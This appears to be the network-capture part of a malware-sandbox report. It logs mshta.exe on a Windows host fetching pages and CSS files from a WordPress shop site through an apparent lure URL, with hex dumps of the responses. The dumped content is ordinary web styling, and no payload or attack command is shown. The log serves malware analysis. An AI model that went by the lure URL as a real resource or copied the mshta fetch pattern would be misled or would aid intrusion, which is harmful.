                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:05 UTC354INHTTP/1.1 404 Not Found
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:04 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          link: <https://gurt.duna.ua/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                          x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                          x-ray: wnp447:0.300/wn447:0.260/wo447
                                                                                                                                                                                          X-Page-Speed: on
                                                                                                                                                                                          Cache-Control: max-age=0, no-cache
                                                                                                                                                                                          2024-10-27 06:35:05 UTC16030INData Raw: 66 65 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 75 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 61 64 69 6e 67 2d 73 69 74 65 20 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 75 72 74 2e 64 75 6e 61 2e 75 61 2f 78 6d 6c 72 70 63 2e 70 68 70 22 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 68 74 6d 6c 29 7b 68 74 6d 6c 2e 63 6c 61 73 73 4e 61 6d 65 20
                                                                                                                                                                                          Data Ascii: fec7<!DOCTYPE html><html lang="uk" class="loading-site no-js"><head><meta charset="UTF-8"/><link rel="profile" href="http://gmpg.org/xfn/11"/><link rel="pingback" href="https://gurt.duna.ua/xmlrpc.php"/><script>(function(html){html.className
                                                                                                                                                                                          2024-10-27 06:35:05 UTC16384INData Raw: 20 69 6e 70 75 74 5b 74 79 70 65 3d 27 62 75 74 74 6f 6e 27 5d 2e 70 72 69 6d 61 72 79 2c 20 2e 62 61 64 67 65 2d 69 6e 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 36 61 33 30 61 3b 7d 2f 2a 20 42 6f 72 64 65 72 20 2a 2f 2e 6e 61 76 2d 76 65 72 74 69 63 61 6c 2e 6e 61 76 2d 74 61 62 73 20 3e 20 6c 69 2e 61 63 74 69 76 65 20 3e 20 61 2c 2e 73 63 72 6f 6c 6c 2d 74 6f 2d 62 75 6c 6c 65 74 73 20 61 2e 61 63 74 69 76 65 2c 2e 6e 61 76 2d 70 61 67 69 6e 61 74 69 6f 6e 20 3e 20 6c 69 20 3e 20 2e 63 75 72 72 65 6e 74 2c 2e 6e 61 76 2d 70 61 67 69 6e 61 74 69 6f 6e 20 3e 20 6c 69 20 3e 20 73 70 61 6e 3a 68 6f 76 65 72 2c 2e 6e 61 76 2d 70 61 67 69 6e 61 74 69 6f 6e 20 3e 20 6c 69 20 3e 20 61 3a 68 6f 76 65 72 2c 2e 68 61 73 2d 68 6f 76
                                                                                                                                                                                          Data Ascii: input[type='button'].primary, .badge-inner{background-color: #f6a30a;}/* Border */.nav-vertical.nav-tabs > li.active > a,.scroll-to-bullets a.active,.nav-pagination > li > .current,.nav-pagination > li > span:hover,.nav-pagination > li > a:hover,.has-hov
                                                                                                                                                                                          2024-10-27 06:35:05 UTC16384INData Raw: 2e 35 38 37 20 2e 31 31 34 20 30 20 30 20 2e 32 39 39 20 2e 35 38 37 20 2e 31 31 34 20 30 20 30 20 22 2f 3e 3c 66 65 43 6f 6d 70 6f 6e 65 6e 74 54 72 61 6e 73 66 65 72 20 63 6f 6c 6f 72 2d 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2d 66 69 6c 74 65 72 73 3d 22 73 52 47 42 22 3e 3c 66 65 46 75 6e 63 52 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 3d 22 30 20 31 22 2f 3e 3c 66 65 46 75 6e 63 47 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 3d 22 30 20 30 2e 32 37 38 34 33 31 33 37 32 35 34 39 30 32 22 2f 3e 3c 66 65 46 75 6e 63 42 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 3d 22 30 2e 35 39 32 31 35 36 38 36 32 37 34 35 31 20 30 2e 32 37 38 34 33 31 33 37 32 35 34 39 30
                                                                                                                                                                                          Data Ascii: .587 .114 0 0 .299 .587 .114 0 0 "/><feComponentTransfer color-interpolation-filters="sRGB"><feFuncR type="table" tableValues="0 1"/><feFuncG type="table" tableValues="0 0.27843137254902"/><feFuncB type="table" tableValues="0.5921568627451 0.2784313725490
                                                                                                                                                                                          2024-10-27 06:35:05 UTC16384INData Raw: 69 74 65 6d 20 6c 61 6e 67 2d 69 74 65 6d 2d 35 36 35 20 6c 61 6e 67 2d 69 74 65 6d 2d 75 6b 20 63 75 72 72 65 6e 74 2d 6c 61 6e 67 20 6e 6f 2d 74 72 61 6e 73 6c 61 74 69 6f 6e 20 6c 61 6e 67 2d 69 74 65 6d 2d 66 69 72 73 74 22 3e 3c 61 20 6c 61 6e 67 3d 22 75 6b 22 20 68 72 65 66 6c 61 6e 67 3d 22 75 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 75 72 74 2e 64 75 6e 61 2e 75 61 2f 22 3e 55 41 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 61 6e 67 2d 69 74 65 6d 20 6c 61 6e 67 2d 69 74 65 6d 2d 35 36 38 20 6c 61 6e 67 2d 69 74 65 6d 2d 72 75 20 6e 6f 2d 74 72 61 6e 73 6c 61 74 69 6f 6e 22 3e 3c 61 20 6c 61 6e 67 3d 22 72 75 2d 52 55 22 20 68 72 65 66 6c 61 6e 67 3d 22 72 75 2d 52 55 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a
                                                                                                                                                                                          Data Ascii: item lang-item-565 lang-item-uk current-lang no-translation lang-item-first"><a lang="uk" hreflang="uk" href="https://gurt.duna.ua/">UA</a></li><li class="lang-item lang-item-568 lang-item-ru no-translation"><a lang="ru-RU" hreflang="ru-RU" href="https:
                                                                                                                                                                                          2024-10-27 06:35:05 UTC16384INData Raw: 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31 2c 31 32 30 2c 32 30 39 29 20 32 30 25 2c 72 67 62 28 32 30 37 2c 0d 0a 36 66 32 37 0d 0a 34 32 2c 31 38 36 29 20 34 30 25 2c 72 67 62 28 32 33 38 2c 34 34 2c 31 33 30 29 20 36 30 25 2c 72 67 62 28 32 35 31 2c 31 30 35 2c 39 38 29 20 38 30 25 2c 72 67 62 28 32 35 34 2c 32 34 38 2c 37 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 36 2c 32 33 36 29 20 30 25 2c 72 67 62 28 31 35 32 2c 31 35 30 2c 32 34 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72
                                                                                                                                                                                          Data Ascii: gb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,6f2742,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gr
                                                                                                                                                                                          2024-10-27 06:35:05 UTC12133INData Raw: 72 6f 64 75 63 74 73 5f 66 69 6c 74 65 72 20 3d 20 22 d0 bf d0 be d0 ba d0 b0 d0 b7 d0 b0 d1 82 d0 b8 20 d1 84 d1 96 d0 bb d1 8c d1 82 d1 80 20 d0 bf d1 80 d0 be d0 b4 d1 83 d0 ba d1 82 d1 96 d0 b2 22 3b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 77 6f 6f 66 5f 6c 61 6e 67 5f 68 69 64 65 5f 70 72 6f 64 75 63 74 73 5f 66 69 6c 74 65 72 20 3d 20 22 d0 bf d1 80 d0 b8 d1 85 d0 be d0 b2 d0 b0 d1 82 d0 b8 20 d1 84 d1 96 d0 bb d1 8c d1 82 d1 80 20 d0 bf d1 80 d0 be d0 b4 d1 83 d0 ba d1 82 d1 96 d0 b2 20 2d 22 3b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 77 6f 6f 66 5f 6c 61 6e 67 5f 70 72 69 63 65 72 61 6e 67 65 20 3d 20 22 d0 b4 d1 96 d0 b0 d0 bf d0 b0 d0 b7 d0 be d0 bd 20 d1 86 d1 96 d0 bd 22 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 77 6f 6f 66 5f 75
                                                                                                                                                                                          Data Ascii: roducts_filter = " "; var woof_lang_hide_products_filter = " -"; var woof_lang_pricerange = " "; var woof_u


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          1192.168.2.449732185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:06 UTC459OUTGET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:07 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:06 GMT
                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                          Content-Length: 2859
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Wed, 05 Jul 2023 10:44:56 GMT
                                                                                                                                                                                          ETag: "64a549a8-b2b"
                                                                                                                                                                                          x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:06 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-10-27 06:35:07 UTC2859INData Raw: 2e 77 70 63 66 37 20 2e 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 72 65 73 70 6f 6e 73 65 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 09 63 6c 69 70 3a 20 72 65 63 74 28 31 70 78 2c 20 31 70 78 2c 20 31 70 78 2c 20 31 70 78 29 3b 0a 09 63 6c 69 70 2d 70 61 74 68 3a 20 69 6e 73 65 74 28 35 30 25 29 3b 0a 09 68 65 69 67 68 74 3a 20 31 70 78 3b 0a 09 77 69 64 74 68 3a 20 31 70 78 3b 0a 09 6d 61 72 67 69 6e 3a 20 2d 31 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 6f 72 64 65 72 3a 20 30 3b 0a 09 77 6f 72 64 2d 77 72 61 70 3a 20 6e 6f 72 6d 61 6c 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 2e 77 70 63 66 37 20 66 6f 72 6d 20 2e 77 70 63 66 37 2d 72 65 73 70 6f
                                                                                                                                                                                          Data Ascii: .wpcf7 .screen-reader-response {position: absolute;overflow: hidden;clip: rect(1px, 1px, 1px, 1px);clip-path: inset(50%);height: 1px;width: 1px;margin: -1px;padding: 0;border: 0;word-wrap: normal !important;}.wpcf7 form .wpcf7-respo


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          2192.168.2.449731185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:06 UTC436OUTGET /wp-includes/css/classic-themes.min.css?ver=1 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:07 UTC329INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:06 GMT
                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                          Content-Length: 217
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Sat, 19 Aug 2023 09:52:46 GMT
                                                                                                                                                                                          ETag: "64e090ee-d9"
                                                                                                                                                                                          x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:06 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-10-27 06:35:07 UTC217INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e 36 36 37 65 6d 20 2b 20 32 70 78 29 20 63 61 6c 63 28 31 2e 33 33 33 65 6d 20 2b 20 32 70 78 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 32 35 65 6d 7d
                                                                                                                                                                                          Data Ascii: /*! This file is auto-generated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          3192.168.2.449733185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:07 UTC464OUTGET /wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:08 UTC333INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:08 GMT
                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                          Content-Length: 27359
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                          ETag: "64e0908f-6adf"
                                                                                                                                                                                          x-ray: wnp447:0.002/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:08 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-10-27 06:35:08 UTC16051INData Raw: 2e 77 6f 6f 66 5f 63 6f 6e 74 61 69 6e 65 72 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 35 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 39 70 78 3b 0a 7d 0a 0a 2e 77 6f 6f 66 5f 63 6f 6e 74 61 69 6e 65 72 20 73 65 6c 65 63 74 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 7d 0a 0a 2e 77 6f 6f 66 5f 63 6f 6e 74 61 69 6e 65 72 20 6c 61 62 65 6c 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 75 6c 2e 77 6f 6f 66 5f 6c 69 73 74 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 6c 69 73 74 2d 73 74 79 6c 65 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 6c 69
                                                                                                                                                                                          Data Ascii: .woof_container{ padding-bottom: 5px; margin-bottom: 9px;}.woof_container select{ width: 100%;}.woof_container label{ display: inline-block !important;}ul.woof_list{ margin: 0 !important; list-style: none !important;}li
                                                                                                                                                                                          2024-10-27 06:35:08 UTC11308INData Raw: 69 6f 5f 63 68 65 63 6b 20 64 74 2e 77 6f 6f 66 5f 73 65 6c 65 63 74 5f 72 61 64 69 6f 5f 63 68 65 63 6b 5f 6f 70 65 6e 65 64 20 61 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 61 30 62 63 63 33 38 35 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 66 66 66 3b 0a 7d 0a 0a 2e 77 6f 6f 66 5f 73 69 64 5f 66 6c 61 74 5f 67 72 65 79 20 2e 77 6f 6f 66 5f 73 65 6c 65 63 74 5f 72 61 64 69 6f 5f 63 68 65 63 6b 20 64 74 20 61 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 73 6f 6c 69 64 20 32 70 78 20 23 61 61 61 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 70 78 3b 0a 7d 0a 2e 77 6f 6f 66 5f 73 69 64 5f
                                                                                                                                                                                          Data Ascii: io_check dt.woof_select_radio_check_opened a { background-color: #a0bcc385; color: #fff !important; border: solid 1px #fff;}.woof_sid_flat_grey .woof_select_radio_check dt a { border: solid 2px #aaa; border-radius: 0px;}.woof_sid_


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          4192.168.2.449734185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:07 UTC475OUTGET /wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.min.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:08 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:08 GMT
                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                          Content-Length: 9765
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                          ETag: "64e0908f-2625"
                                                                                                                                                                                          x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:08 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-10-27 06:35:08 UTC9765INData Raw: 2f 2a 21 0a 43 68 6f 73 65 6e 2c 20 61 20 53 65 6c 65 63 74 20 42 6f 78 20 45 6e 68 61 6e 63 65 72 20 66 6f 72 20 6a 51 75 65 72 79 20 61 6e 64 20 50 72 6f 74 6f 74 79 70 65 0a 62 79 20 50 61 74 72 69 63 6b 20 46 69 6c 6c 65 72 20 66 6f 72 20 48 61 72 76 65 73 74 2c 20 68 74 74 70 3a 2f 2f 67 65 74 68 61 72 76 65 73 74 2e 63 6f 6d 0a 0a 56 65 72 73 69 6f 6e 20 63 75 73 74 6f 6d 0a 46 75 6c 6c 20 73 6f 75 72 63 65 20 61 74 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 68 61 72 76 65 73 74 68 71 2f 63 68 6f 73 65 6e 0a 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 48 61 72 76 65 73 74 20 68 74 74 70 3a 2f 2f 67 65 74 68 61 72 76 65 73 74 2e 63 6f 6d 0a 0a 4d 49 54 20 4c 69 63 65 6e 73 65 2c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d
                                                                                                                                                                                          Data Ascii: /*!Chosen, a Select Box Enhancer for jQuery and Prototypeby Patrick Filler for Harvest, http://getharvest.comVersion customFull source at https://github.com/harvesthq/chosenCopyright (c) Harvest http://getharvest.comMIT License, https://github.com


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          5192.168.2.449735185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:09 UTC482OUTGET /wp-content/plugins/woocommerce-products-filter/ext/by_author/css/by_author.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:09 UTC329INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:09 GMT
                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                          Content-Length: 163
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                          ETag: "64e0908f-a3"
                                                                                                                                                                                          x-ray: wnp447:0.010/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:09 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-10-27 06:35:09 UTC163INData Raw: 2e 77 6f 6f 66 5f 61 75 74 68 6f 72 73 20 6c 69 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 37 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 75 6c 2e 77 6f 6f 66 5f 61 75 74 68 6f 72 73 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a
                                                                                                                                                                                          Data Ascii: .woof_authors li{ margin-top:7px !important; list-style-type: none !important;}ul.woof_authors{ margin: 0 !important; padding: 0 !important;}


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          6192.168.2.449736185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-10-27 06:35:09 UTC484OUTGET /wp-content/plugins/woocommerce-products-filter/ext/by_instock/css/by_instock.css?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
                                                                                                                                                                                          Accept-Language: en-CH
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                          Host: gurt.duna.ua
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2024-10-27 06:35:09 UTC328INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Sun, 27 Oct 2024 06:35:09 GMT
                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                          Content-Length: 61
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                          ETag: "64e0908f-3d"
                                                                                                                                                                                          x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                          Expires: Sun, 03 Nov 2024 06:35:09 GMT
                                                                                                                                                                                          Cache-Control: max-age=604800
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-10-27 06:35:09 UTC61INData Raw: 2e 77 6f 6f 66 5f 63 68 65 63 6b 62 6f 78 5f 69 6e 73 74 6f 63 6b 5f 63 6f 6e 74 61 69 6e 65 72 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 34 70 78 3b 0a 7d 0a 0a
                                                                                                                                                                                          Data Ascii: .woof_checkbox_instock_container{ margin-bottom: 4px;}


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          7192.168.2.449737185.68.16.1894437508C:\Windows\System32\mshta.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
